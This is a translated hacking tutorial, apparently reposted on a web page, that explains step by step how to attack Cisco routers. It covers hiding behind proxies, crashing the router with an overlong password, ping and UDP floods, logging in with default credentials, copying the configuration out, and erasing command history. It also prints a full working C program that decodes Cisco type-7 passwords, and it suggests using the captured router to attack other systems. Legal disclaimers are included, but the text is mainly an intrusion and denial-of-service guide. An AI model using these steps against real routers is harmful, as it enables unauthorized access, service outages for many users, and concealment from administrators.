Attack a Cisco Router

Source: Internet
Author: User
Tags: ping and traceroute

The original article is from BlackSun. I translated it in my sleeping hours. It is a very good article and I am very happy to share it with you!


Do not use this to damage a Cisco system or to access any system illegally. This article is for learning only; it may be used only for legal activity and must not be used to damage any system. It shows step by step how known defects can be used to gain unauthorized access. If you break into a Cisco router or disrupt it, hundreds of network clients will lose their connection and the losses can be large. So do this only where you have permission; otherwise you will get into a lot of trouble!

----------------------------------------------------------------------------------------------

What you need to know before reading:

-What is an IP address?

-What is an ISP?

-What is a TCP/IP packet?

-How to hide your IP address?

-How to use Telnet?

-How to Use HyperTerminal?

-How to Use Ping?

-How to Use TraceRoute?

-How to use a proxy server?

----------------------------------------------------------------------------------------------

-Section 1: Why are Cisco routers attacked?

-Section 2: How to find a Cisco router?

-Section 3: How to break into a Cisco router?

-Section 4: How to crack the password?

-Section 5: How to use a Cisco router?

----------------------------------------------------------------------------------------------

What you need to know before reading:

----------------------------------------------------------------------------------------------

What is an IP address?

IP is short for Internet Protocol. A computer uses an IP address to identify and connect to other computers on the network. This is how someone can get you kicked off IRC, or find your ISP and your approximate location. IP addresses are easy to obtain, for example:

-When you visit a website, your IP address is logged.

-On IRC, anyone can get your IP address.

-On ICQ and OICQ, someone can get your IP address simply, with a few small tools.

-If your computer is connected to someone, run netstat (for example "netstat -n") to list the connections; the peers are shown by IP address.

-Someone sends you an e-mail containing a Java program that reports your IP address.

There are many other ways to get an IP address, including Trojans and backdoor programs.


What is an ISP?

ISP is the abbreviation of Internet Service Provider; you connect to the Internet through them. After dialing in, you are connected to their equipment. We can run a traceroute to find our ISP (traceroute is introduced later).

You should see something like this:


Tracing route to []

over a maximum of 30 hops:

1 147 ms 122 ms 132 ms your.isp [] <- your ISP

2 122 ms 143 ms 123 ms isp.firewall [] <- the ISP's firewall

Article entry: csh; responsible editor: csh

----------------------------------------------------------------------------------------------

How to use Telnet?

In the Windows telnet client's Preferences you can change the buffer size.

You can also enable or disable "local echo". If you enable "local echo", your computer displays everything you type, and the connected computer displays its response as well.

So you will see the following: when you type "hello", what you see is

hheelllloo

This is because the characters sent back are mixed with the ones you typed. The only reason I turn it on is to check whether the machine I am connected to is responding to my input.

By default telnet connects to the telnet port, which is port 23, but you are not limited to port 23: you can give a different port whenever you connect. Port 25 is the mail server (SMTP) port, port 21 is the FTP port, and there are tens of thousands of ports in total, so pick the right one!

----------------------------------------------------------------------------------------------

How to use HyperTerminal?

HyperTerminal can listen on any port of your computer; if something arrives on that port, you can exchange data with it. If it is not under Start > Programs > Accessories > Communications, you can install it from the Control Panel. First choose the connection type: select "TCP/IP (Winsock)", enter the computer to connect to, and enter the port below it. To wait for incoming connections instead, choose Call > Wait for a Call. Other computers can then connect to you on that port, and you can chat or transfer files.

Translator's note: my HyperTerminal may be different, but it does not have this function.

----------------------------------------------------------------------------------------------

How to Use Ping?

Ping is easy to use: in MS-DOS mode, enter "ping IP-address". By default Windows sends four echo requests; the count can be changed with the -n option.

"ping IP-address -t" pings until you stop it with Ctrl+C.

You can change the packet size like this: "ping -l (size) IP-address".

Ping sends packets to a remote machine; when the remote machine receives them it sends them back, and we see how long the round trip took. The shorter the time, the faster the link; under congestion some packets are lost. A stream of pings slows down the machine being pinged and, when the traffic is high enough, can even take it down. According to the original article, a one-minute ping flood could crash a Windows 98 machine (its connection buffer overflowed from too many connections and Windows decided to take a rest :>). A ping flood also uses a lot of your own bandwidth, so your bandwidth needs to be larger than the target's (unless the target runs Windows 98 and you have a good modem, in which case you can take it out in a minute).

Ping floods have no effect on robust systems.

Note: the DOS -t option is not a flood. It sends one request per second, with long gaps in between. On Unix or Linux you can use the -f option (flood ping, which needs root) to send requests as fast as replies come back; that is a real ping flood, and the ping in practically every Unix and Linux distribution has it.

----------------------------------------------------------------------------------------------

How to Use TraceRoute?

To trace your connection (and see the route to the target machine), just enter "tracert IP-address" in MS-DOS mode. You will see a list of computers: the machines the packets pass through between you and the target.

You can use this to tell whether there is a firewall in front of the target, or to find someone's ISP (Internet Service Provider).

To find the ISP, look at the hop just before the target machine; it should be the ISP's router.

Basically, this is how traceroute works. Every IP packet carries a value in its IP header called TTL, short for Time To Live (if you do not know what that means it does not matter; just read on). Without it a packet caught in a routing loop would circulate forever and eat bandwidth, so every router that forwards a packet decrements its TTL by one, and when the TTL reaches 0 the packet is discarded and an ICMP "time exceeded" error is sent back to the sender. Traceroute first sends a probe with TTL 1, which is discarded by the very first router; the source address of the ICMP error tells traceroute who the first hop is. It then sends a probe with TTL 2, whose error comes back from the second hop, and so on until a probe reaches the destination and is answered normally. That gives the whole path. (Windows tracert sends ICMP echo requests as probes; most Unix traceroutes send UDP packets to high ports, but the TTL trick is the same.)


Do you understand now?
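The following is an added example, not code from the original article, that simulates the TTL mechanism just described on a constructed path: three routers and a destination using RFC 5737 documentation addresses, one router of which silently discards expired packets without sending the ICMP error, the way a firewall often does. The addresses, the router list and the choice of silent hop are assumptions made up for the example; the probe loop is the same one a real traceroute runs against the network.

```c
#include <stdio.h>
#include <string.h>

#define MAX_HOPS 30

/* Constructed path (RFC 5737 test addresses), not a real network. */
static const char *const PATH[] = { "192.0.2.1", "198.51.100.7", "203.0.113.9" };
static const int NROUTERS = 3;
static const char *const DEST = "203.0.113.50";
/* Index of a router that drops expired packets without replying, as a
 * firewall often does; -1 for none. Assumption for the example. */
static const int SILENT_HOP = 1;

enum reply_kind { REPLY_NONE, REPLY_TIME_EXCEEDED, REPLY_ECHO };
struct reply { enum reply_kind kind; const char *from; };

/* Simulate one probe with the given TTL. Every router decrements TTL; the
 * one that brings it to 0 discards the packet and (unless it is the silent
 * hop) returns ICMP Time Exceeded from its own address. A probe that survives
 * every router is answered by the destination itself. */
static struct reply send_probe(int ttl, const char *const *routers, int nrouters,
                               const char *dest, int silent_hop)
{
    struct reply r = { REPLY_NONE, NULL };
    for (int i = 0; i < nrouters; i++) {
        if (--ttl == 0) {
            if (i != silent_hop) {
                r.kind = REPLY_TIME_EXCEEDED;
                r.from = routers[i];
            }
            return r;          /* packet dropped here, silently or not */
        }
    }
    r.kind = REPLY_ECHO;
    r.from = dest;
    return r;
}

/* Traceroute: send probes with TTL 1, 2, 3, ... and record who answered each.
 * Fills hops[] with the responding address, or "*" for a hop that never
 * replied. Returns the number of hops including the destination, or
 * MAX_HOPS if the destination was never reached. */
static int traceroute(const char *const *routers, int nrouters, const char *dest,
                      int silent_hop, const char *hops[MAX_HOPS])
{
    for (int ttl = 1; ttl <= MAX_HOPS; ttl++) {
        struct reply r = send_probe(ttl, routers, nrouters, dest, silent_hop);
        hops[ttl - 1] = (r.kind == REPLY_NONE) ? "*" : r.from;
        if (r.kind == REPLY_ECHO)
            return ttl;
    }
    return MAX_HOPS;
}

int main(void)
{
    const char *hops[MAX_HOPS];
    int n = traceroute(PATH, NROUTERS, DEST, SILENT_HOP, hops);

    printf("Tracing route to %s over a maximum of %d hops:\n", DEST, MAX_HOPS);
    for (int i = 0; i < n; i++)
        printf("%2d  %s\n", i + 1, hops[i]);
    return 0;
}
```

The second hop prints as "*", exactly what a real tracert shows when a firewall drops the expired probe instead of answering it; the hops after it are still found, because their probes carry a larger TTL and pass through the silent router before expiring.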

----------------------------------------------------------------------------------------------

How to use a proxy server?

Search the Internet for a proxy server, one that has the port you need open. Once you have found one, you can use telnet or HyperTerminal to connect through the proxy to another computer, so the receiving computer cannot tell your IP address. (The proxy itself, of course, sees and may log your real address.)

----------------------------------------------------------------------------------------------

Section 1: Why are Cisco routers attacked?

You may wonder why anyone would want to attack a Cisco router.

The answer is that it is very useful for breaking into other systems...

Cisco routers are very fast; some of them have 18 T1 lines connected. They are also very flexible. Most of them run telnet, and they can be used as a base for DoS attacks or for attacking other systems.

They also have thousands of packets passing through them, many of which can be captured and decoded, and many routers are trusted by the other systems on their network. That lets you gain access to other computers in that network.

----------------------------------------------------------------------------------------------

Section 2: How to find a Cisco router?

Finding a Cisco router is simple. Almost all ISPs use at least one Cisco router. The simplest method is to run tracert in DOS: it shows many of the machines between you and a target, and there will almost certainly be one with "cisco" in its hostname. When you find one, write down its IP address.

Translator's note: in China the hostname may not contain "cisco", but there must be a router. You can use SuperScan to scan the first two IP addresses and see which of them has port 2001 (Cisco router management) and port 23 open!

Now you have the location of a Cisco router, but it may be protected by a firewall, so check whether pings to it are blocked. If it answers ping, it is probably not blocked. Another way is to try to reach some of the Cisco router's ports. Telnet to port 23 and look at the prompt: a plain Cisco vty line asks only for a password, so if you are asked for a username first you may be talking to a firewall or another device in front of the router.

Try to find a router that is not protected by a firewall, because this tutorial is about routers, not about getting through firewalls. When you are sure you have found a good system, find a proxy server that allows port 23, so that your IP address is not logged by the router.

Translator's note: find a machine that runs Wingate.

----------------------------------------------------------------------------------------------

Section 3: How to break into a Cisco router?

Many Cisco routers run version 4.1 software (widely used at the time of the original article), which is easy to knock over. You just connect to the Cisco router through your proxy server and enter a very long string as the password.

Now wait: the Cisco router will reboot. You could say you have attacked it and taken it offline... but in 2-10 minutes it will be back up and we can get in.

If nothing happens, the router is not running the vulnerable software. You can try a few DoS attacks, such as a heavy ping flood: in DOS, enter "ping -l 56550 cisco.router.ip -t", which has the same effect.

Translator's note: it is very likely that none of the above will work. If you want to take the machine down, try a UDP flood tool (udpflood, which can be found through Yahoo). Be careful! I trust you know how to protect yourself.

If it did go down, connect again through another proxy server. The username is "admin" and the password is "admin", because that is the default: when it is temporarily disabled it comes back in its default state.

A caveat: a Cisco router reloads its saved startup configuration from NVRAM when it reboots, so it only comes back with default passwords if the administrator never saved the running configuration. Do not count on it.

Translator's note: there will be an article on my homepage listing the default usernames and passwords of almost all routers.

Once you are in, get the password file! Different routers run different software, but most show a prompt such as "htl-textil". Enter "?" and look at the output: you will see many commands. Among them you will find a transfer command; as the current admin user, use it to send the password file to port 23 on your computer. Before that you have to set up HyperTerminal to wait for the call. When the file is sent, HyperTerminal asks whether you want to receive it; accept, save it on your computer, and disconnect. (On IOS the configuration, with its "password 7" lines, is what "show running-config" prints and what "copy running-config tftp" sends to a TFTP server.) You have passed the hardest part. Next we start cracking the password.

----------------------------------------------------------------------------------------------

Section 4: How to crack the password?

Now that you have the password file, you have to crack it before you can go further into the router. You can run software like John the Ripper on it.

That is the simplest method, and the one I recommend. The other method is to decode it directly; this needs a decoding program and some patience.

Here is a program dedicated to decoding the Cisco "password 7" entries in a router configuration. These are not hashes: IOS stores them as a two-digit seed followed by the password XORed with a fixed, publicly known key, so they can be reversed instantly. You can compile it on Linux (for example "cc -o cdecrypt cdecrypt.c"):

/*
 * cdecrypt: decode Cisco IOS "type 7" passwords (the reversible scheme used
 * by "service password-encryption"). The encoded form is two decimal digits
 * (a start index 00-15 into the key below) followed by hex byte pairs; each
 * byte is one password character XORed with the key byte at that index.
 *
 * Build: cc -o cdecrypt cdecrypt.c
 * Usage: cdecrypt -p <encoded password>
 *        cdecrypt [config file [output file]]   (default: stdin to stdout)
 */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Fixed XOR key. The first 22 bytes are the table from the original article;
 * the remaining bytes are the rest of the well-known key, added so that
 * passwords longer than the original table could reach decode correctly. */
static const unsigned char xlat[] = {
    0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
    0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
    0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44, 0x48, 0x53,
    0x55, 0x42, 0x73, 0x67, 0x76, 0x63, 0x61, 0x36,
    0x39, 0x38, 0x33, 0x34, 0x6e, 0x63, 0x78, 0x76,
    0x39, 0x38, 0x37, 0x33, 0x32, 0x35, 0x34, 0x6b,
    0x3b, 0x66, 0x67, 0x38, 0x37
};

/* Configuration keywords that are followed by a type-7 string. The article
 * used "enable-password"; IOS itself writes "enable password". */
static const char *const pw_strs[] = {
    "password 7 ", "enable-password 7 ", "enable password 7 "
};

static const char *pname;

/* Value of one hex digit, or -1 if c is not a hex digit. */
static int hexval(int c)
{
    if (isdigit(c))
        return c - '0';
    c = toupper(c);
    if (c >= 'A' && c <= 'F')
        return c - 'A' + 10;
    return -1;
}

/* Decode enc_pw into dec_pw (which must have room for strlen(enc_pw)/2 bytes).
 * Returns 0 on success, -1 if the string is malformed or too long for the key. */
static int cdecrypt(const char *enc_pw, char *dec_pw)
{
    size_t len = strlen(enc_pw), i;
    unsigned int seed;

    if (len < 2 || (len & 1))
        return -1;
    if (!isdigit((unsigned char)enc_pw[0]) || !isdigit((unsigned char)enc_pw[1]))
        return -1;
    seed = (enc_pw[0] - '0') * 10 + (enc_pw[1] - '0');
    if (seed > 15)
        return -1;

    for (i = 2; i < len; i += 2) {
        size_t pos = (i - 2) / 2;            /* index of this password byte */
        int hi = hexval((unsigned char)enc_pw[i]);
        int lo = hexval((unsigned char)enc_pw[i + 1]);
        if (hi < 0 || lo < 0 || seed + pos >= sizeof xlat)
            return -1;
        dec_pw[pos] = (char)((hi * 16 + lo) ^ xlat[seed + pos]);
    }
    dec_pw[(len - 2) / 2] = '\0';
    return 0;
}

static void usage(void)
{
    fprintf(stdout, "Usage: %s -p <encoded password>\n", pname);
    fprintf(stdout, "       %s [config file [output file]]\n", pname);
}

int main(int argc, char **argv)
{
    FILE *in = stdin, *out = stdout;
    char line[257];
    char passwd[129];

    pname = argv[0];

    if (argc > 1 && argv[1][0] == '-') {
        switch (argv[1][1]) {
        case 'h':
            usage();
            return 0;
        case 'p':
            if (argc < 3 || cdecrypt(argv[2], passwd) != 0) {
                fprintf(stderr, "Error.\n");
                return 1;
            }
            fprintf(stdout, "password: %s\n", passwd);
            return 0;
        default:
            fprintf(stderr, "%s: unknown option.\n", pname);
            return 1;
        }
    }
    if (argc > 3) {
        usage();
        return 1;
    }
    if (argc > 1 && (in = fopen(argv[1], "r")) == NULL) {
        perror(argv[1]);
        return 1;
    }
    if (argc > 2 && (out = fopen(argv[2], "w")) == NULL) {
        perror(argv[2]);
        return 1;
    }

    /* Copy the configuration through, replacing every encoded password
     * with its decoded value and leaving all other lines untouched. */
    while (fgets(line, sizeof line, in) != NULL) {
        char *p = line;
        const char *pw_str = NULL;
        size_t k;

        line[strcspn(line, "\r\n")] = '\0';
        while (*p == ' ' || *p == '\t')      /* IOS indents these lines */
            p++;
        for (k = 0; k < sizeof pw_strs / sizeof pw_strs[0]; k++) {
            if (strncmp(p, pw_strs[k], strlen(pw_strs[k])) == 0) {
                pw_str = pw_strs[k];
                break;
            }
        }
        if (pw_str == NULL) {
            fprintf(out, "%s\n", line);
            continue;
        }
        if (cdecrypt(p + strlen(pw_str), passwd) != 0) {
            fprintf(stderr, "Error.\n");
            return 1;
        }
        fprintf(out, "%.*s%s%s\n", (int)(p - line), line, pw_str, passwd);
    }
    if (in != stdin)
        fclose(in);
    if (out != stdout)
        fclose(out);
    return 0;
}
If you are not using Linux, you can run software such as John the Ripper on the password file to crack the passwords. Note that a cracker is only needed for real hashes, such as an "enable secret 5" line (MD5); a "password 7" line is decoded directly with the program above and needs no cracking at all.

----------------------------------------------------------------------------------------------

Section 5: How to use a Cisco router?

To use it, you must first connect to it, through a proxy so that your IP address is not logged. Once you are in, if you want to turn off the command history to hide what you do, just enter "terminal history size 0"; then no command history is kept. Enter "?" to see the commands; most router commands are available to you.

A caveat: "terminal history size 0" only affects the recall buffer of your own terminal session. It does nothing about syslog, AAA command accounting or the login records for the vty lines, so it does not make you invisible.

These routers generally have telnet, so you can telnet from them to other systems (such as Unix boxes) and attack those. You can also use ping and traceroute from the router to map systems, or run DoS attacks from it. You can also sniff packets, but I do not recommend it: it does not always work and you will be discovered....

----------------------------------------------------------------------------------------------

If your first attack on a Cisco router fails, don't worry... nobody succeeds on the first or second try. It takes continuous practice and a lot of patience.

Whatever you choose to do with this, do it only where it is legal!

---- Excerpted from "League"
